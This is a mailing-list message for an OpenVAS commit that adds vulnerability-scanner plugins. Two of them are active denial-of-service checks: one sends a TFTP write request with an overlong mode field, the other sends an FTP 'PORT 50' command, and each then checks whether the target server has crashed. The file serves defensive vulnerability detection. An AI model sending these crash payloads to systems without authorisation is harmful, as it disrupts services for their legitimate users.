[Openvas-commits] r13744 - in trunk/openvas-plugins: . scripts

Tue Jul 17 16:23:56 CEST 2012

Author: antu123
Date: 2012-07-17 16:23:55 +0200 (Tue, 17 Jul 2012)
New Revision: 13744

Added:
   trunk/openvas-plugins/scripts/gb_3ctftpsvc_tftp_server_mode_bof_vuln.nasl
   trunk/openvas-plugins/scripts/gb_freeftpd_port_cmd_dos_vuln.nasl
   trunk/openvas-plugins/scripts/gb_ms_unauth_digital_cert_spoofing_vuln.nasl
Modified:
   trunk/openvas-plugins/ChangeLog
   trunk/openvas-plugins/scripts/gb_ms_fraudulent_digital_cert_spoofing_vuln.nasl
   trunk/openvas-plugins/scripts/secpod_ms12-050.nasl
   trunk/openvas-plugins/scripts/secpod_ms12-051_macosx.nasl
Log:
Added new plugins, Updated CVSS and Deprecated.

Modified: trunk/openvas-plugins/ChangeLog
===================================================================

--- trunk/openvas-plugins/ChangeLog	2012-07-17 10:55:26 UTC (rev 13743)
+++ trunk/openvas-plugins/ChangeLog	2012-07-17 14:23:55 UTC (rev 13744)
@@ -1,3 +1,19 @@
+2012-07-17  Antu Sanadi <santu at secpod.com>
+
+	* scripts/gb_3ctftpsvc_tftp_server_mode_bof_vuln.nasl,
+	scripts/gb_freeftpd_port_cmd_dos_vuln.nasl,
+	scripts/gb_ms_unauth_digital_cert_spoofing_vuln.nasl:
+	Added new plugins.
+
+	* scripts/secpod_ms12-050.nasl:
+	Updated the file path to avoid a possible FP.
+
+	* scripts/secpod_ms12-051_macosx.nasl:
+	Updated CVSS and and risk factor.
+
+	* scripts/gb_ms_fraudulent_digital_cert_spoofing_vuln.nasl:
+	Deprecated, It is addressed in gb_unauth_digital_cert_spoofing_vuln.nasl
+
 2012-07-17 Michael Meyer <michael.meyer at greenbone.net>
 
 	* scripts/secpod_database_open_access_vuln.nasl:


Property changes on: trunk/openvas-plugins/ChangeLog
___________________________________________________________________
Added: svn:keywords
   + Revision Date Id

Added: trunk/openvas-plugins/scripts/gb_3ctftpsvc_tftp_server_mode_bof_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_3ctftpsvc_tftp_server_mode_bof_vuln.nasl	                        (rev 0)
+++ trunk/openvas-plugins/scripts/gb_3ctftpsvc_tftp_server_mode_bof_vuln.nasl	2012-07-17 14:23:55 UTC (rev 13744)
@@ -0,0 +1,114 @@
+##############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# 3CTftpSvc TFTP Server Long Mode Buffer Overflow Vulnerability
+#
+# Authors:
+# Sooraj KS <kssooraj at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(802658);
+  script_version("$Revision$");
+  script_cve_id("CVE-2006-6183");
+  script_bugtraq_id(21301, 21322);
+  script_tag(name:"cvss_base", value:"10.0");
+  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
+  script_tag(name:"risk_factor", value:"Critical");
+  script_tag(name:"last_modification", value:"$Date$");
+  script_tag(name:"creation_date", value:"2012-07-10 15:15:15 +0530 (Tue, 10 Jul 2012)");
+  script_name("3CTftpSvc TFTP Server Long Mode Buffer Overflow Vulnerability");
+  desc = "
+  Overview: This host is running 3CTftpSvc TFTP Server and is prone to buffer
+  overflow vulnerability.
+
+  Vulnerability Insight:
+  The flaw is caused due to a boundary error during the processing of TFTP
+  Read/Write request packet types. This can be exploited to cause a stack
+  based buffer overflow by sending a specially crafted packet with an overly
+  long mode field.
+
+  Impact:
+  Successful exploitation will allow attackers to cause the application to
+  crash, denying further service to legitimate users.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  3Com 3CTFTPSvc TFTP Server version 2.0.1
+
+  Fix: No solution or patch is available as on 10th July, 2012. Information
+  regarding this issue will be updated once the solution details are available.
+  For updates refer, http://support.3com.com/software/utilities_for_windows_32_bit.htm
+
+  References:
+  http://secunia.com/advisories/23113
+  http://xforce.iss.net/xforce/xfdb/30545
+  http://cxsecurity.com/issue/WLB-2006120002
+  http://support.3com.com/software/utilities_for_windows_32_bit.htm
+  http://www.securityfocus.com/archive/1/archive/1/452754/100/0/threaded ";
+
+  script_description(desc);
+  script_summary("Determine if 3CTFTPSvc TFTP Server is prone to a denial of service");
+  script_category(ACT_DENIAL);
+  script_copyright("Copyright (c) 2012 Greenbone Networks GmbH");
+  script_family("Buffer overflow");
+  script_require_ports("Services/udp/tftp");
+  exit(0);
+}
+
+
+include("tftp.inc");
+
+## Get TFTP Port
+port = get_kb_item("Services/udp/tftp");
+if(!port){
+  port = 69;
+}
+
+## Check TFTP Port Status
+if(! tftp_alive(port:port)){
+  exit(0);
+}
+
+## Open UDP Socket
+soc = open_sock_udp(port);
+if(!soc){
+  exit(0);
+}
+
+## Construct the attack request with long transporting mode
+mode = "netascii" + crap(data: "A", length: 469);
+attack = raw_string(0x00, 0x02) +       ## Write Request
+         "A" + raw_string(0x00) +       ## Source File Name
+         mode + raw_string(0x00);       ## Type (Mode)
+
+## Send the attack request to TFTP Server
+send(socket:soc, data:attack);
+send(socket:soc, data:attack);
+close(soc);
+
+sleep(2);
+
+## Check TFTP Server is alive or not
+if(!tftp_alive(port:port)) {
+  security_hole(port:port, proto:"udp");
+}


Property changes on: trunk/openvas-plugins/scripts/gb_3ctftpsvc_tftp_server_mode_bof_vuln.nasl
___________________________________________________________________
Added: svn:keywords
   + Revision Date Id

Added: trunk/openvas-plugins/scripts/gb_freeftpd_port_cmd_dos_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_freeftpd_port_cmd_dos_vuln.nasl	                        (rev 0)
+++ trunk/openvas-plugins/scripts/gb_freeftpd_port_cmd_dos_vuln.nasl	2012-07-17 14:23:55 UTC (rev 13744)
@@ -0,0 +1,158 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# freeFTPD PORT Command Denial of Service Vulnerability
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(802913);
+  script_version("$Revision$");
+  script_cve_id("CVE-2005-3812");
+  script_bugtraq_id(15557);
+  script_tag(name:"cvss_base", value:"6.8");
+  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:S/C:N/I:N/A:C");
+  script_tag(name:"risk_factor", value:"High");
+  script_tag(name:"last_modification", value:"$Date$");
+  script_tag(name:"creation_date", value:"2012-07-13 14:06:29 +0530 (Fri, 13 Jul 2012)");
+  script_name("freeFTPD PORT Command Denial of Service Vulnerability");
+  desc = "
+  Overview: This host is running FreeFTPD Server and is prone to denial of
+  service vulnerability.
+
+  Vulnerability Insight:
+  A NULL pointer dereferencing error exists when parsing the parameter of the
+  PORT command. Logged on user can send a port command appended with some
+  numbers to crash the server.
+
+  Impact:
+  Successful exploitation allows remote attackers to crash an affected server,
+  effectively denying service to legitimate users.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  freeFTPd version 1.0.10 and prior
+
+  Fix: Upgrade to freeFTPd version 1.0.11 or later
+  For updates refer, http://www.freesshd.com/?ctt=download
+
+  References:
+  http://osvdb.org/show/osvdb/21108
+  http://secunia.com/advisories/17737
+  http://www.exploit-db.com/exploits/1339/
+  http://www.securityfocus.com/archive/1/417602 ";
+
+  script_description(desc);
+  script_summary("Check if freeFTPd is prone to DoS vulnerability");
+  script_category(ACT_DENIAL);
+  script_copyright("Copyright (C) 2012 Greenbone Networks GmbH");
+  script_family("Denial of Service");
+  script_require_ports("Services/ftp", 21);
+  exit(0);
+}
+
+
+##
+## The script code starts here
+##
+
+include("ftp_func.inc");
+
+## Variable Initialization
+ftpPort = "";
+soc = "";
+soc2 = "";
+banner = "";
+user = "";
+pass = "";
+login_details = "";
+
+## Get ftp Port
+ftpPort = get_kb_item("Services/ftp");
+if(!ftpPort){
+  ftpPort = 21;
+}
+
+## check port status
+if(!get_port_state(ftpPort)){
+  exit(0);
+}
+
+## Open TCP Socket
+soc = open_sock_tcp(ftpPort);
+if(!soc) {
+  exit(0);
+}
+
+## Accept the banner and
+## Confirm the Application before trying exploit
+banner = recv(socket:soc, length:512);
+if("I'm freeFTPd" >!< banner)
+{
+  ftp_close(socket:soc);
+  exit(0);
+}
+
+## Check for the user name and password
+user = get_kb_item("ftp/login");
+if(! user){
+  user = "anonymous";
+}
+
+pass = get_kb_item("ftp/password");
+if(! pass){
+  pass = "anonymous";
+}
+
+## Try to Login
+login_details = ftp_authenticate(socket:soc, user:user, pass:pass);
+if(!login_details)
+{
+  ftp_close(socket:soc);
+  exit(0);
+}
+
+data = "PORT 50";
+
+## Send the crafted data
+ftp_send_cmd(socket:soc, cmd:data);
+ftp_close(socket:soc);
+
+## Open the socket to confirm FTP server is alive
+soc2 = open_sock_tcp(ftpPort);
+if(!soc2)
+{
+  security_hole(ftpPort);
+  exit(0);
+}
+
+## Some time server will be listening, but won't respond
+banner =  recv(socket:soc2, length:512);
+if("I'm freeFTPd" >!< banner)
+{
+  ftp_close(socket:soc2);
+  security_hole(ftpPort);
+  exit(0);
+}
+ftp_close(socket:soc2);


Property changes on: trunk/openvas-plugins/scripts/gb_freeftpd_port_cmd_dos_vuln.nasl
___________________________________________________________________
Added: svn:keywords
   + Revision Date Id

Modified: trunk/openvas-plugins/scripts/gb_ms_fraudulent_digital_cert_spoofing_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_ms_fraudulent_digital_cert_spoofing_vuln.nasl	2012-07-17 10:55:26 UTC (rev 13743)
+++ trunk/openvas-plugins/scripts/gb_ms_fraudulent_digital_cert_spoofing_vuln.nasl	2012-07-17 14:23:55 UTC (rev 13744)
@@ -28,12 +28,17 @@
 {
   script_id(802403);
   script_version("$Revision$");
+  script_tag(name:"deprecated", value:TRUE);
   script_tag(name:"cvss_base", value:"5.0");
   script_tag(name:"risk_factor", value:"Medium");
   script_tag(name:"last_modification", value:"$Date$");
   script_tag(name:"creation_date", value:"2011-11-11 12:04:44 +0530 (Fri, 11 Nov 2011)");
   script_name("MS Windows Fraudulent Digital Certificates Spoofing Vulnerability (2641690)");
   desc = "
+  This NVT has been superseded by KB2718704 Which is addressed in NVT
+  gb_unauth_digital_cert_spoofing_vuln.nasl (OID:1.3.6.1.4.1.25623.1.0.802634).
+
+
   Overview: The host is installed with Microsoft Windows operating system and
   is prone to spoofing vulnerability.
 
@@ -73,6 +78,8 @@
   exit(0);
 }
 
+exit(66); ## This NVT is deprecated as it is superseded by KB2718704
+          ## Which is addressed in gb_unauth_digital_cert_spoofing_vuln.nasl
 
 include("smb_nt.inc");
 include("secpod_reg.inc");

Added: trunk/openvas-plugins/scripts/gb_ms_unauth_digital_cert_spoofing_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_ms_unauth_digital_cert_spoofing_vuln.nasl	                        (rev 0)
+++ trunk/openvas-plugins/scripts/gb_ms_unauth_digital_cert_spoofing_vuln.nasl	2012-07-17 14:23:55 UTC (rev 13744)
@@ -0,0 +1,172 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# Microsoft Unauthorized Digital Certificates Spoofing Vulnerability (2728973)
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(802912);
+  script_version("$Revision$");
+  script_tag(name:"cvss_base", value:"9.3");
+  script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:C/I:C/A:C");
+  script_tag(name:"risk_factor", value:"Critical");
+  script_tag(name:"last_modification", value:"$Date$");
+  script_tag(name:"creation_date", value:"2012-07-12 17:17:25 +0530 (Thu, 12 Jul 2012)");
+  script_name("Microsoft Unauthorized Digital Certificates Spoofing Vulnerability (2728973)");
+  desc = "
+  Overview: This host is installed with Microsoft Windows operating system and
+  is prone to Spoofing vulnerability.
+
+  Vulnerability Insight:
+  Microsoft certificate authorities, which are stored outside the recommended
+  secure storage practices can be misused. An attacker could use these
+  certificates to spoof content, perform phishing attacks, or perform
+  man-in-the-middle attacks.
+
+  Impact:
+  Successful exploitation could allow remote attackers to use the
+  certificates to spoof content, perform phishing attacks, or perform
+  man-in-the-middle attacks.
+
+  Impact Level: System
+
+  Affected Software/OS:
+  Microsoft Windows XP x32 Edition Service Pack 3 and prior
+  Microsoft Windows XP x64 Edition Service Pack 2 and prior
+  Microsoft Windows 7 x32/x64 Edition Service Pack 1 and prior
+  Microsoft Windows 2003 x32/x64 Edition Service Pack 2 and prior
+  Microsoft Windows Vista x32/x64 Edition Service Pack 2 and prior
+  Microsoft Windows Server 2008 R2 x64 Edition Service Pack 1 and prior
+  Microsoft Windows Server 2008 x32/x64 Edition Service Pack 2 and prior
+
+  Fix: Apply the Patch from below link,
+  http://support.microsoft.com/kb/2728973
+
+  References:
+  http://support.microsoft.com/kb/2728973
+  http://technet.microsoft.com/en-us/security/advisory/2728973 ";
+
+  script_description(desc);
+  script_summary("Check if affected certificates are Untrusted Certificates");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("This script is Copyright (C) 2012 Greenbone Networks GmbH");
+  script_family("Windows");
+  script_dependencies("smb_reg_service_pack.nasl");
+  exit(0);
+}
+
+
+include("smb_nt.inc");
+include("secpod_reg.inc");
+
+## Variable Initialization
+certs = "";
+cert = "";
+flag = FALSE;
+
+## Check for OS and Service Pack
+if(hotfix_check_sp(xp:4, xpx64:3, win2003:3, win2003x64:3, winVista:3, win7:2,
+                   win7x64:2, win2008:3, win2008r2:2) <= 0){
+  exit(0);
+}
+
+## Untrusted Certificates Path
+key = "SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\";
+if(!registry_key_exists(key:key)) {
+  exit(0);
+}
+
+## The invalid certificates and their thumbprints
+certs = make_list(
+        ## Microsoft Genuine Windows Phone Public Preview CA01
+        "E38A2B7663B86796436D8DF5898D9FAA6835B238",
+        ## Microsoft IPTVe CA
+        "BED412B1334D7DFCEBA3015E5F9F905D571C45CF",
+        ## Microsoft Online CA001
+        "A1505D9843C826DD67ED4EA5209804BDBB0DF502",
+        ## Microsoft Online Svcs BPOS APAC CA1
+        "D43153C8C25F0041287987250F1E3CABAC8C2177",
+        ## Microsoft Online Svcs BPOS APAC CA2
+        "D8CE8D07F9F19D2569C2FB854401BC99C1EB7C3B",
+        ##Microsoft Online Svcs BPOS APAC CA3
+        "E95DD86F32C771F0341743EBD75EC33C74A3DED9",
+        ##Microsoft Online Svcs BPOS APAC CA4
+        "3A26012171855D4020C973BEC3F4F9DA45BD2B83",
+        ## Microsoft Online Svcs BPOS APAC CA5
+        "D0BB3E3DFBFB86C0EEE2A047E328609E6E1F185E",
+        ## Microsoft Online Svcs BPOS APAC CA6
+        "08738A96A4853A52ACEF23F782E8E1FEA7BCED02",
+        ## Microsoft Online Svcs BPOS CA1
+        "7613BF0BA261006CAC3ED2DDBEF343425357F18B",
+        ## Microsoft Online Svcs BPOS CA2
+        "587B59FB52D8A683CBE1CA00E6393D7BB923BC92",
+        ## Microsoft Online Svcs BPOS CA2
+        "4ED8AA06D1BC72CA64C47B1DFE05ACC8D51FC76F",
+        ## Microsoft Online Svcs BPOS CA2
+        "F5A874F3987EB0A9961A564B669A9050F770308A",
+        ## Microsoft Online Svcs BPOS EMEA CA1
+        "A35A8C727E88BCCA40A3F9679CE8CA00C26789FD",
+        ## Microsoft Online Svcs BPOS EMEA CA2
+        "E9809E023B4512AA4D4D53F40569C313C1D0294D",
+        ## Microsoft Online Svcs BPOS EMEA CA3
+        "A7B5531DDC87129E2C3BB14767953D6745FB14A6",
+        ## Microsoft Online Svcs BPOS EMEA CA4
+        "330D8D3FD325A0E5FDDDA27013A2E75E7130165F",
+        ## Microsoft Online Svcs BPOS EMEA CA5
+        "09271DD621EBD3910C2EA1D059F99B8181405A17",
+        ## Microsoft Online Svcs BPOS EMEA CA6
+        "838FFD509DE868F481C29819992E38A4F7082873",
+        ## Microsoft Online Svcs CA1
+        "23EF3384E21F70F034C467D4CBA6EB61429F174E",
+        ## Microsoft Online Svcs CA1
+        "A221D360309B5C3C4097C44CC779ACC5A9845B66",
+        ## Microsoft Online Svcs CA3
+        "8977E8569D2A633AF01D0394851681CE122683A6",
+        ## Microsoft Online Svcs CA3
+        "374D5B925B0BD83494E656EB8087127275DB83CE",
+        ## Microsoft Online Svcs CA4
+        "6690C02B922CBD3FF0D0A5994DBD336592887E3F",
+        ## Microsoft Online Svcs CA4
+        "5D5185DF1EB7DC76015422EC8138A5724BEE2886",
+        ## Microsoft Online Svcs CA5
+        "A81706D31E6F5C791CD9D3B1B9C63464954BA4F5",
+        ## Microsoft Online Svcs CA5
+        "4DF13947493CFF69CDE554881C5F114E97C3D03B",
+        ## Microsoft Online Svcs CA6
+        "09FF2CC86CEEFA8A8BB3F2E3E84D6DA3FABBF63E"
+        );
+
+## Check if certificates are added by checking registry key
+foreach cert (certs)
+{
+  if(! registry_key_exists(key: key+cert))
+  {
+    flag = TRUE;
+    break;
+  }
+}
+
+if(flag){
+  security_hole(0);
+}


Property changes on: trunk/openvas-plugins/scripts/gb_ms_unauth_digital_cert_spoofing_vuln.nasl
___________________________________________________________________
Added: svn:keywords
   + Revision Date Id

Modified: trunk/openvas-plugins/scripts/secpod_ms12-050.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_ms12-050.nasl	2012-07-17 10:55:26 UTC (rev 13743)
+++ trunk/openvas-plugins/scripts/secpod_ms12-050.nasl	2012-07-17 14:23:55 UTC (rev 13744)
@@ -129,8 +129,8 @@
 infoPath = "";
 
 ## InfoPath 2007 and InfoPath 2010
-keys = make_list("SOFTWARE\Microsoft\Office\12.0\Common\InstallRoot",
-                 "SOFTWARE\Microsoft\Office\14.0\Common\InstallRoot");
+keys = make_list("SOFTWARE\Microsoft\Office\12.0\InfoPath\InstallRoot",
+                 "SOFTWARE\Microsoft\Office\14.0\InfoPath\InstallRoot");
 foreach key(keys)
 {
   if(registry_key_exists(key:key))

Modified: trunk/openvas-plugins/scripts/secpod_ms12-051_macosx.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_ms12-051_macosx.nasl	2012-07-17 10:55:26 UTC (rev 13743)
+++ trunk/openvas-plugins/scripts/secpod_ms12-051_macosx.nasl	2012-07-17 14:23:55 UTC (rev 13744)
@@ -30,9 +30,9 @@
   script_version("$Revision$");
   script_cve_id("CVE-2012-1894");
   script_bugtraq_id(54361);
-  script_tag(name:"cvss_base", value:"9.3");
-  script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:C/I:C/A:C");
-  script_tag(name:"risk_factor", value:"Critical");
+  script_tag(name:"cvss_base", value:"6.9");
+  script_tag(name:"cvss_base_vector", value:"AV:L/AC:M/Au:N/C:C/I:C/A:C");
+  script_tag(name:"risk_factor", value:"High");
   script_tag(name:"last_modification", value:"$Date$");
   script_tag(name:"creation_date", value:"2012-07-11 08:54:28 +0530 (Wed, 11 Jul 2012)");
   script_name("Microsoft Office Privilege Elevation Vulnerability - 2721015 (Mac OS X)");

